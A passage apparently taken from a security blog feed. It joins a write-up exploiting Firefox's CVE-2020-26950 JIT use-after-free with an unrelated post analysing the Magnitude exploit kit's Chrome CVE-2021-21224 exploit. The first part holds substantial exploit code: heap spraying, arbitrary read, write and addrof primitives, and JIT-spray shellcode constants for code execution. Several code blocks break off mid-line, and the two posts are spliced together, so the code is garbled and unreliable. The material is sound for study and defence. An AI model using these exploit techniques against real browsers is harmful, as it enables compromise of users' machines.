3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:

Use-after-free

The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp
 
// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
   }
}
 
// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
}
 
// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f)or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
}
 
// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
}
 
// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
   }
}
 
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
 
   // Create an object to be read for the UAF
   var target = {};
   for (var i = 0; i 

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straight forward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs often have a whole number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer getting saved and it being used when freed are not aliasing with the use. If they were, then that would mean that a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout, and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for objects, defined by the constant MaxNurseryBufferSize, which is 1024.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has less than 256 properties in it, then jemalloc will allocate this as a “Small” allocation. If it has 256 or more properties in it, then jemalloc will allocate this as a “Large” allocation. In order to further understand these two and their differences, it’s best to refer to these two sources which extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.

Reallocating

In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

/*
   jitme - Triggers the vulnerability
*/
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
 
   new cons(); // Trigger the vulnerability - Reallocates the object slots
 
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
  
   // Avoid Elements Copy-On-Write by pushing a value
   target.push(i);
  
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
 
   // Return the corrupted array
   return target;
}
 
/*
   init - Initialises vulnerable objects
*/
function init() {
   // arr will contain our sprayed objects
   var arr = [];
 
   // We'll create one object...
   var cons = function() {};
   for(i=0; i

Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write Nan-Boxed values to out of bounds locations (in this case, the next Slots store).

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake Nan-Boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. Being in the tenured heap means that the ArrayBuffer object itself will be inaccessible as it is in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and have thus created a separate arena for them:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];
}

arg(1,2);

Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined
}

arg(1);

To avoid needing to separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it’s rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered “deleted” from the arguments object. This means that the actual value doesn’t need to be removed and arguments and parameters can share the same space without problems.

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
 
// Global that holds the target argument so it can be used later
arg = 0;
 
/*
   setup_prim - Performs recursion to get the vulnerable arguments object
       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
*/
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
 
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
 
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
 
       // If it was null, then we return and try the next one
       return 0;
   }
 
   // Get the cons value
   let cons = arguments[0][arguments[1]];
 
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
 
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
 
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
 
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
 
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
 
   // Otherwise just return 0 and try the next one
   return 0;
}
 
/*
   main - Performs the exploit
*/
function main() {
   ...
 
   //
   TOTAL=arr.length;
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
}

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

/*
   weak_read32 - Bit-by-bit read
*/
function weak_read32(arg, addr) {
   // Set the RareArgumentsData pointer to the address
   evil[511] = addr;
 
   // Used to hold the leaked data
   let val = 0;
  
   // Read it bit-by-bit for 32 bits
   // Endianness is taken into account
   for(let i = 32; i >= 0; i--) {
       val = val = 0; i--) {
       val[0] = val[0] 

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straight forward by iterating backwards from the RareArgumentsData pointer (As ArgumentsObject was allocated before the RareArgumentsData pointer, we work backwards) that was leaked using the corrupted array:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   old_rareargdat_ptr = evil[511];
   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
 
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation
   while(counter 

The next step is to allocate an ArrayBuffer and find its location:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
 
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter
   while(counter 

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
  
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;
   for(i=0;i

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

/*
   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
*/
function write_nan(arg, addr) {
   evil[511] = addr;
   for(let i = 64 - 15; i 

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

/*
   write - Write a value to an address
*/
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);
}

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

/*
   addrof - Gets the address of a given object
*/
function addrof(arg, o) {
   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o
   return (BigInt(fake_arrbuf[1] & 0xffff) 

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

/*
   shellcode - Constant values which hold our shellcode to pop xcalc.
*/
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
}
 
/*
   main - Performs the exploit
*/
function main() {
   for(i = 0;i 

A video of the exploit can be found here.

Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out!

More coming soon! pic.twitter.com/g6K9tuK4UG

— maxpl0it (@maxpl0it) February 1, 2022

Conclusion

Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives were found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

Exploit Kits vs. Google Chrome

In October 2021, we discovered that the Magnitude exploit kit was testing out a Chromium exploit chain in the wild. This really piqued our interest, because browser exploit kits have in the past few years focused mainly on Internet Explorer vulnerabilities and it was believed that browsers like Google Chrome are just too big of a target for them.

#MagnitudeEK is now stepping up its game by using CVE-2021-21224 and CVE-2021-31956 to exploit Chromium-based browsers. This is an interesting development since most exploit kits are currently targeting exclusively Internet Explorer, with Chromium staying out of their reach.

— Avast Threat Labs (@AvastThreatLabs) October 19, 2021

About a month later, we found that the Underminer exploit kit followed suit and developed an exploit for the same Chromium vulnerability. That meant there were two exploit kits that dared to attack Google Chrome: Magnitude using CVE-2021-21224 and CVE-2021-31956 and Underminer using CVE-2021-21224, CVE-2019-0808, CVE-2020-1020, and CVE-2020-1054.

We’ve been monitoring the exploit kit landscape very closely since our discoveries, watching out for any new developments. We were waiting for other exploit kits to jump on the bandwagon, but none other did, as far as we can tell. What’s more, Magnitude seems to have abandoned the Chromium exploit chain. And while Underminer still continues to use these exploits today, its traditional IE exploit chains are doing much better. According to our telemetry, less than 20% of Underminer’s exploitation attempts are targeting Chromium-based browsers.

This is some very good news because it suggests that the Chromium exploit chains were not as successful as the attackers hoped they would be and that it is not currently very profitable for exploit kit developers to target Chromium users. In this blog post, we would like to offer some thoughts into why that could be the case and why the attackers might have even wanted to develop these exploits in the first place. And since we don’t get to see a new Chromium exploit chain in the wild every day, we will also dissect Magnitude’s exploits and share some detailed technical information about them.

Exploit Kit Theory

To understand why exploit kit developers might have wanted to test Chromium exploits, let’s first look at things from their perspective. Their end goal in developing and maintaining an exploit kit is to make a profit: they just simply want to maximize the difference between money “earned” and money spent. To achieve this goal, most modern exploit kits follow a simple formula. They buy ads targeted to users who are likely to be vulnerable to their exploits (e.g. Internet Explorer users). These ads contain JavaScript code that is automatically executed, even when the victim doesn’t interact with the ad in any way (sometimes referred to as drive-by attacks). This code can then further profile the victim’s browser environment and select a suitable exploit for that environment. If the exploitation succeeds, a malicious payload (e.g. ransomware or a coinminer) is deployed to the victim. In this scenario, the money “earned” could be the ransom or mining rewards. On the other hand, the money spent is the cost of ads, infrastructure (renting servers, registering domain names etc.), and the time the attacker spends on developing and maintaining the exploit kit.

Modus operandi of a typical browser exploit kit

The attackers would like to have many diverse exploits ready at any given time because it would allow them to cast a wide net for potential victims. But it is important to note that individual exploits generally get less effective over time. This is because the number of people susceptible to a known vulnerability will decrease as some people patch and other people upgrade to new devices (which are hopefully not plagued by the same vulnerabilities as their previous devices). This forces the attackers to always look for new vulnerabilities to exploit. If they stick with the same set of exploits for years, their profit would eventually reduce down to almost nothing.

So how do they find the right vulnerabilities to exploit? After all, there are thousands of CVEs reported each year, but only a few of them are good candidates for being included in an exploit kit. Weaponizing an exploit generally takes a lot of time (unless, of course, there is a ready-to-use PoC or the exploit can be stolen from a competitor), so the attackers might first want to carefully take into account multiple characteristics of each vulnerability. If a vulnerability scores well across these characteristics, it looks like a good candidate for inclusion in an exploit kit. Some of the more important characteristics are listed below.

  • Prevalence of the vulnerability
    The more users are affected by the vulnerability, the more attractive it is to the attackers. 
  • Exploit reliability
    Many exploits rely on some assumptions or are based on a race condition, which makes them fail some of the time. The attackers obviously prefer high-reliability exploits.
  • Difficulty of exploit development
    This determines the time that needs to be spent on exploit development (if the attackers are even capable of exploiting the vulnerability). The attackers tend to prefer vulnerabilities with a public PoC exploit, which they can often just integrate into their exploit kit with minimal effort.
  • Targeting precision
    The attackers care about how hard it is to identify (and target ads to) vulnerable victims. If they misidentify victims too often (meaning that they serve exploits to victims who they cannot exploit), they’ll just lose money on the malvertising.
  • Expected vulnerability lifetime
    As was already discussed, each vulnerability gets less effective over time. However, the speed at which the effectiveness drops can vary a lot between vulnerabilities, mostly based on how effective is the patching process of the affected software.
  • Exploit detectability
    The attackers have to deal with numerous security solutions that are in the business of protecting their users against exploits. These solutions can lower the exploit kit’s success rate by a lot, which is why the attackers prefer more stealthy exploits that are harder for the defenders to detect. 
  • Exploit potential
    Some exploits give the attackers System, while others might make them only end up inside a sandbox. Exploits with less potential are also less useful, because they either need to be chained with other LPE exploits, or they place limits on what the final malicious payload is able to do.

Looking at these characteristics, the most plausible explanation for the failure of the Chromium exploit chains is the expected vulnerability lifetime. Google is extremely good at forcing users to install browser patches: Chrome updates are pushed to users when they’re ready and can happen many times in a month (unlike e.g. Internet Explorer updates which are locked into the once-a-month “Patch Tuesday” cycle that is only broken for exceptionally severe vulnerabilities). When CVE-2021-21224 was a zero-day vulnerability, it affected billions of users. Within a few days, almost all of these users received a patch. The only unpatched users were those who manually disabled (or broke) automatic updates, those who somehow managed not to relaunch the browser in a long time, and those running Chromium forks with bad patching habits.

A secondary reason for the failure could be attributed to bad targeting precision. Ad networks often allow the attackers to target ads based on various characteristics of the user’s browser environment, but the specific version of the browser is usually not one of these characteristics. For Internet Explorer vulnerabilities, this does not matter that much: the attackers can just buy ads for Internet Explorer users in general. As long as a certain percentage of Internet Explorer users is vulnerable to their exploits, they will make a profit. However, if they just blindly targeted Google Chrome users, the percentage of vulnerable victims might be so low, that the cost of malvertising would outweigh the money they would get by exploiting the few vulnerable users. Google also plans to reduce the amount of information given in the User-Agent string. Exploit kits often heavily rely on this string for precise information about the browser version. With less information in the User-Agent header, they might have to come up with some custom version fingerprinting, which would most likely be less accurate and costly to manage.

Now that we have some context about exploit kits and Chromium, we can finally speculate about why the attackers decided to develop the Chromium exploit chains. First of all, adding new vulnerabilities to an exploit kit seems a lot like a “trial and error” activity. While the attackers might have some expectations about how well a certain exploit will perform, they cannot know for sure how useful it will be until they actually test it out in the wild. This means it should not be surprising that sometimes, their attempts to integrate an exploit turn out worse than they expected. Perhaps they misjudged the prevalence of the vulnerabilities or thought that it would be easier to target the vulnerable victims. Perhaps they focused too much on the characteristics that the exploits do well on: after all, they have reliable, high-potential exploits for a browser that’s used by billions. It could also be that this was all just some experimentation where the attackers just wanted to explore the land of Chromium exploits.

It’s also important to point out that the usage of Internet Explorer (which is currently vital for the survival of exploit kits) has been steadily dropping over the past few years. This may have forced the attackers to experiment with how viable exploits for other browsers are because they know that sooner or later they will have to make the switch. But judging from these attempts, the attackers do not seem fully capable of making the switch as of now. That is some good news because it could mean that if nothing significant changes, exploit kits might be forced to retire when Internet Explorer usage drops below some critical limit.

CVE-2021-21224

Let’s now take a closer look at the Magnitude’s exploit chain that we discovered in the wild. The exploitation starts with a JavaScript exploit for CVE-2021-21224. This is a type confusion vulnerability in V8, which allows the attacker to execute arbitrary code within a (sandboxed) Chromium renderer process. A zero-day exploit for this vulnerability (or issue 1195777, as it was known back then since no CVE ID had been assigned yet) was dumped on Github on April 14, 2021. The exploit worked for a couple of days against the latest Chrome version, until Google rushed out a patch about a week later.

It should not be surprising that Magnitude’s exploit is heavily inspired by the PoC on Github. However, while both Magnitude’s exploit and the PoC follow a very similar exploitation path, there are no matching code pieces, which suggests that the attackers didn’t resort that much to the “Copy/Paste” technique of exploit development. In fact, Magnitude’s exploit looks like a more cleaned-up and reliable version of the PoC. And since there is no obfuscation employed (the attackers probably meant to add it in later), the exploit is very easy to read and debug. There are even very self-explanatory function names, such as confusion_to_oob, addrof, and arb_write, and variable names, such as oob_array, arb_write_buffer, and oob_array_map_and_properties. The only way this could get any better for us researchers would be if the authors left a couple of helpful comments in there…

Interestingly, some parts of the exploit also seem inspired by a CTF writeup for a “pwn” challenge from *CTF 2019, in which the players were supposed to exploit a made-up vulnerability that was introduced into a fork of V8. While CVE-2021-21224 is obviously a different (and actual rather than made-up) vulnerability, many of the techniques outlined in that writeup apply for V8 exploitation in general and so are used in the later stages of the Magnitude’s exploit, sometimes with the very same variable names as those used in the writeup.

The core of the exploit, triggering the vulnerability to corrupt the length of vuln_array

The root cause of the vulnerability is incorrect integer conversion during the SimplifiedLowering phase. This incorrect conversion is triggered in the exploit by the Math.max call, shown in the code snippet above. As can be seen, the exploit first calls foofunc in a loop 0x10000 times. This is to make V8 compile that function because the bug only manifests itself after JIT compilation. Then, helper["gcfunc"] gets called. The purpose of this function is just to trigger garbage collection. We tested that the exploit also works without this call, but the authors probably put it there to improve the exploit’s reliability. Then, foofunc is called one more time, this time with flagvar=true, which makes xvar=0xFFFFFFFF. Without the bug, lenvar should now evaluate to -0xFFFFFFFF and the next statement should throw a RangeError because it should not be possible to create an array with a negative length. However, because of the bug, lenvar evaluates to an unexpected value of 1. The reason for this is that the vulnerable code incorrectly converts the result of Math.max from an unsigned 32-bit integer 0xFFFFFFFF to a signed 32-bit integer -1. After constructing vuln_array, the exploit calls Array.prototype.shift on it. Under normal circumstances, this method should remove the first element from the array, so the length of vuln_array should be zero. However, because of the disparity between the actual and the predicted value of lenvar, V8 makes an incorrect optimization here and just puts the 32-bit constant 0xFFFFFFFF into Array.length (this is computed as 0-1 with an unsigned 32-bit underflow, where 0 is the predicted length and -1 signifies Array.prototype.shift decrementing Array.length). 

A demonstration of how an overwrite on vuln_array can corrupt the length of oob_array

Now, the attackers have successfully crafted a JSArray with a corrupted Array.length, which allows them to perform out-of-bounds memory reads and writes. The very first out-of-bounds memory write can be seen in the last statement of the confusion_to_oob function. The exploit here writes 0xc00c to vuln_array[0x10]. This abuses the deterministic memory layout in V8 when a function creates two local arrays. Since vuln_array was created first, oob_array is located at a known offset from it in memory and so by making out-of-bounds memory accesses through vuln_array, it is possible to access both the metadata and the actual data of oob_array. In this case, the element at index 0x10 corresponds to offset 0x40, which is where Array.length of oob_array is stored. The out-of-bounds write therefore corrupts the length of oob_array, so it is now too possible to read and write past its end.

The addrof and fakeobj exploit primitives

Next, the exploit constructs the addrof and fakeobj exploit primitives. These are well-known and very powerful primitives in the world of JavaScript engine exploitation. In a nutshell, addrof leaks the address of a JavaScript object, while fakeobj creates a new, fake object at a given address. Having constructed these two primitives, the attacker can usually reuse existing techniques to get to their ultimate goal: arbitrary code execution. 

A step-by-step breakdown of the addrof primitive. Note that just the lower 32 bits of the address get leaked, while %DebugPrint returns the whole 64-bit address. In practice, this doesn’t matter because V8 compresses pointers by keeping upper 32 bits of all heap pointers constant.

Both primitives are constructed in a similar way, abusing the fact that vuln_array[0x7] and oob_array[0] point to the very same memory location. It is important to note here that  vuln_array is internally represented by V8 as HOLEY_ELEMENTS, while oob_array is PACKED_DOUBLE_ELEMENTS (for more information about internal array representation in V8, please refer to this blog post by the V8 devs). This makes it possible to write an object into vuln_array and read it (or more precisely, the pointer to it) from the other end in oob_array as a double. This is exactly how addrof is implemented, as can be seen above. Once the address is read, it is converted using helper["f2ifunc"] from double representation into an integer representation, with the upper 32 bits masked out, because the double takes 64 bits, while pointers in V8 are compressed down to just 32 bits. fakeobj is implemented in the same fashion, just the other way around. First, the pointer is converted into a double using helper["i2ffunc"]. The pointer, encoded as a double, is then written into oob_array[0] and then read from vuln_array[0x7], which tricks V8 into treating it as an actual object. Note that there is no masking needed in fakeobj because the double written into oob_array is represented by more bits than the pointer read from vuln_array.

The arbitrary read/write exploit primitives

With addrof and fakeobj in place, the exploit follows a fairly standard exploitation path, which seems heavily inspired by the aforementioned *CTF 2019 writeup. The next primitives constructed by the exploit are arbitrary read/write. To achieve these primitives, the exploit fakes a JSArray (aptly named fake in the code snippet above) in such a way that it has full control over its metadata. It can then overwrite the fake JSArray’s elements pointer, which points to the address where the actual elements of the array get stored. Corrupting the elements pointer allows the attackers to point the fake array to an arbitrary address, and it is then subsequently possible to read/write to that address through reads/writes on the fake array.

Let’s look at the implementation of the arbitrary read/write primitive in a bit more detail. The exploit first calls the get_arw function to set up the fake JSArray. This function starts by using an overread on oob_array[3] in order to leak map and properties of oob_array (remember that the original length of oob_array was 3 and that its length got corrupted earlier). The map and properties point to structures that basically describe the object type in V8. Then, a new array called point_array gets created, with the oob_array_map_and_properties value as its first element. Finally, the fake JSArray gets constructed at offset 0x20 before point_array. This offset was carefully chosen, so that the the JSArray structure corresponding to fake overlaps with elements of point_array. Therefore, it is possible to control the internal members of fake by modifying the elements of point_array. Note that elements in point_array take 64 bits, while members of the JSArray structure usually only take 32 bits, so modifying one element of point_array might overwrite two members of fake at the same time. Now, it should make sense why the first element of point_array was set to oob_array_map_and_properties. The first element is at the same address where V8 would look for the map and properties of fake. By initializing it like this, fake is created to be a PACKED_DOUBLE_ELEMENTS JSArray, basically inheriting its type from oob_array.

